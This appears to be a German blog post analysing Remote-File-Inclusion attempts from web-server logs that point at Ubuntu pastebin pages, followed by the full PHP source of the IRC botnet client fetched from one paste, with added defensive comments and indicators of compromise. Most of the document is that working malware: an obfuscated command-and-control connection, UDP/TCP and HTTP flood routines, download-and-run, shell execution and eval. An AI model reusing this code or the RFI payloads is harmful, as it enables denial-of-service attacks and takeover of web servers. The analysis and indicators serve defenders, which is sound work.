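Ob Ubuntu eure bevorzugte Distribution ist, sei einmal dahingestellt.
Offensichtlich wird jedoch der Pastebin in der „plain“-Ansicht dafür ausgenutzt, Webseiten zu übernehmen. Die folgenden Log-Zeilen zeigen Remote-File-Inclusion-Versuche (RFI): Ein Parameter, den das angefragte Skript offenbar in einen include-Pfad übernimmt, wird auf eine Pastebin-URL gesetzt. Dagegen hilft, allow_url_include in der php.ini deaktiviert zu lassen und include-Pfade nie aus Request-Parametern zu bilden.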
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
Schauen wir uns einmal diesen letzten "pastebin" an:
CODE:
<?php
// Runtime setup for a long-lived process: keep executing after the HTTP client
// that triggered the request has disconnected, remove the execution time limit,
// and report all errors. For a defender, a web-server PHP worker that never
// finishes and holds an outbound socket is the visible consequence of these calls.
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
// bMain: controller of the captured IRC bot. It holds the configuration, opens
// one bBot connection per configured server, runs the main loop, and implements
// the flood and "update" routines that bBot::parsecommand() calls.
class bMain
{
// Tunables read throughout the script.
var $config = array(
// "prefix" => "HOMOVAN|",
// upper bound for the number of digits appended to a generated nick
"maxnumbers" => 5,
// length of the random ident (USER name)
"maxident" => 6,
// first character that marks a channel/private message as a command
"trigger" => ".",
// user modes requested after registration (numeric 001)
"modes" => "-ix",
// a sender is accepted when its host part contains one of these strings (see bBot::parsebuffer)
"adminhosts" => array("i.love.ircsluts.net"),
// maximum length passed to fgets() per read
"sockbuffer" => 512,
// seconds between periodic JOIN re-sends in heartbeat()
"rejoindelay" => 900,
// minimum seconds between IRC PINGs sent while a flood loop is running
"cpingdelay" => 10,
// loop iterations per burst before the elapsed time is checked (startchess, udp / tcp)
"chessburstudp" => 5000,
"chessbursttcp" => 100,
// loop iterations per burst before the elapsed time is checked (starthttp)
"httpburst" => 20,
);
// Command-and-control servers. The values are Base64 and are decoded in start();
// this is obfuscation only. They decode to host carter.wiggynet.org.uk,
// port 9000 and channel #mobfigga, which are usable as network indicators.
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
// true: commands received on this connection are honoured (bBot::$allowcontrol)
"control" => true,
),
);
// list of bBot connection objects
var $bots = array();
// timestamp of the last periodic re-join
var $lastrejointime;
// PHP 4-style constructor (method named after the class): records the start time.
function bMain()
{
$this->lastrejointime = time();
}
// Creates and connects one bBot per entry in $servers, then loops over
// heartbeat() without returning.
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
// channel names, host and port are stored Base64-encoded and decoded only here
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
// One pass of the main loop: re-sends JOIN on every connection once
// "rejoindelay" seconds have passed, then lets each connected bot process one
// line of input. A bot that is not connected and whose last connect attempt is
// more than 10 seconds old ends the whole script via exit(); the reconnect
// code is commented out.
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
// Builds a nick from two randomly chosen words of the list below followed by
// random digits, lower-cased. The loop bound is re-drawn on every iteration,
// so the digit count varies between 1 and "maxnumbers". The fixed word list
// makes the nick pattern recognisable in IRC server logs.
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
// Returns "maxident" random lower-case letters, used as the ident in USER.
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
// Returns how many entries of $bots currently report isconnected().
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
// Traffic flood behind the "chess" command (denial-of-service capability).
// $t  transport, "udp" or "tcp" (checked by the caller, bBot::parsecommand)
// $h  destination host
// $p  destination port; a value outside 1..65000 selects a random port per iteration
// $ps payload size in bytes
// $ti duration in seconds
// Returns the number of loop iterations (connection attempts) performed.
// The payload is generated once and reused, so every packet of one run carries
// the same bytes; on the wire this shows up as many short-lived connections or
// datagrams from the web server to a single host.
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
// errors from fsockopen are suppressed; the socket is opened with a 1 s timeout
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
// between bursts, send PING on every IRC connection at most every "cpingdelay" seconds
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
// HTTP request flood behind the "http" command (denial-of-service capability).
// $url  target URL; only host, path and query are used, the port is always 80
// $secs duration in seconds
// Returns false when parse_url() fails, otherwise the number of loop iterations.
// Recognisable traits in the target's access logs: the User-Agent is drawn from
// the six fixed strings below, and each connection is closed right after the
// request is written although the request says "Connection: Keep-Alive".
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
// the host name is resolved once, before the loop
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
// between bursts, send PING on every IRC connection at most every "cpingdelay" seconds
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
// Disabled helper: in this listing spawnfakethreads() exists only inside this comment.
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
// Download-and-run routine behind the "update" command: fetches $url, reports
// the byte count to $source via $sourcebot, writes the content to a temporary
// file created in /tmp with the prefix "pdata", hands "$runcmd <file>" to
// spawnfakethreads(), deletes the file and ends the script with "Updating".
// Returns false when nothing could be downloaded.
// Forensic note: look for pdata* files in /tmp and for outbound fetches made by
// the web-server account.
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
// Disabled helper, kept only as a comment in the captured sample.
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
// bBot: one IRC client connection. It registers with the server, joins the
// configured channels, parses incoming lines and dispatches operator commands.
// Both parsebuffer() and parsecommand() reach the controller through the
// global $mainclass.
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
// when false, PRIVMSG lines on this connection are ignored
var $allowcontrol = false;
var $socket;
var $lastreconnect;
// Stores the server address and the ident used by the next connect().
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
// Opens the TCP connection (5 s timeout), switches the socket to non-blocking
// mode and sends USER and NICK. The real-name field of USER carries the
// php_uname() string, so the host's operating-system details are disclosed to
// the IRC server. Returns false when the socket reports EOF after opening.
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
// Sends QUIT and closes the socket.
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
// Remembers $nick; with $set = true it also sends NICK to the server.
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
// Enables or disables command handling for this connection.
function setcontrol($control)
{
$this->allowcontrol = $control;
}
// Sends JOIN for every channel in $channels.
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
// Writes one line, terminated with CRLF, to the IRC socket.
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
// Sends $text to $target as PRIVMSG, or as NOTICE when $notice is true.
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
// True when a socket exists and has not reached EOF.
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
// Reads at most one line from the socket and reacts to it.
// Returns false (after a 100 ms sleep) when nothing usable was read.
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
// answer server PINGs to keep the connection alive
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
// 001: registration accepted -> set user modes and join the channels
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
// 433: nick already in use -> NICK is sent again with the current nick
case "433":
$this->raw("NICK {$this->currentnick}");
break;
// PRIVMSG: possible operator command, handled only on control connections
case "PRIVMSG":
if (!$this->allowcontrol) break;
// $host[1] is the part of the sender prefix after "@"
$host = explode("@", $cmd[0]);
// rebuild the message text from the space-split tokens
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
// the only authorisation check: case-insensitive substring match of the
// sender's host against the "adminhosts" list
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
// KICK: rejoin when the kicked nick is this bot
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
// Executes one operator command.
// $args     command words, $args[0] being the command name
// $source   where replies are sent (the PRIVMSG target field)
// $hostname sender prefix; not used in this method
// Capabilities visible here: host reconnaissance (info), two flood types
// (chess, http), download-and-run (update), extra IRC connections
// (connect/disconnect), shell command execution (exec) and PHP evaluation (eval).
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
// info: reports php_uname(), the safe_mode setting and, when available, the URL
// built from SERVER_NAME and REQUEST_URI, i.e. the request this script runs under.
// That URL is what to search for in the web server's access log.
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
// die: sends QUIT and terminates the script
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
// chess: validates the argument count and transport, runs bMain::startchess()
// and reports the volume sent
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
// update: hands the arguments to bMain::update() (download and run)
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
// connections: lists index, host, port and nick of every connected bot
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
// connect: opens an additional IRC connection with the given host, port, nick,
// channels and control flag, and keeps it when the connection succeeds
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
// disconnect: closes the connection with the given index; refuses to drop the
// last control connection and terminates the script when only one connection is left
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $source);
break;
}
}
if (count($mainclass->bots) <= 1) {
$this->raw("QUIT :Final connection dropped, quitting");
die();
break;
}
if ($mainclass->bots[$conid]) {
$mainclass->bots[$conid]->disconnect();
unset($mainclass->bots[$conid]);
// sort() re-indexes the remaining connections from 0
sort($mainclass->bots);
$this->say("Connection ".$args[1]." disconnected", $source);
}
else $this->say("Invalid connection ID", $source);
break;
// exec: joins the remaining words into a command line, runs it through popen()
// with stderr merged into stdout, reads up to 8192 bytes and relays the output
// line by line. Commands run with the privileges of the web-server account;
// child processes spawned by the PHP worker are the host-side trace.
case "exec":
$txt = "";
for ($i=1; $i<1024; $i++) {
if (isset($args[$i])) $txt .= $args[$i]." ";
else break;
}
$ph = popen($txt." 2>&1", "r");
$read = fread($ph, 8192);
$out = explode("\n", $read);
pclose($ph);
foreach ($out as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
break;
// eval: passes $args to eval() under output buffering and relays the captured
// output line by line
case "eval":
ob_start();
eval($args);
$outa = explode("\n", ob_get_flush());
foreach ($outa as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
ob_end_flush();
break;
// http: runs bMain::starthttp() for the given URL and duration and reports the request count
case "http":
if ($numargs < 2) {
$this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source);
break;
}
$this->say("HTTP request flood starting", $source);
$requests = $mainclass->starthttp($args[1], intval($args[2]));
if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source);
else $this->say("HTTP flood error, no requests sent", $source);
break;
}
}
}
// Entry point: the controller is created as the global $mainclass, which the
// bBot methods read via "global $mainclass". start() connects to the configured
// servers and then loops, so the including request does not finish on its own.
$mainclass = new bMain;
$mainclass->start();
?>
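Interessant ist die Base64-Kodierung der Server- und Channel-Variablen. Sie ist nur Verschleierung, keine Verschlüsselung: Dekodiert ergeben die Werte den IRC-Server carter.wiggynet.org.uk, Port 9000, und den Channel #mobfigga – brauchbar als Indikatoren für Firewall- und Proxy-Logs.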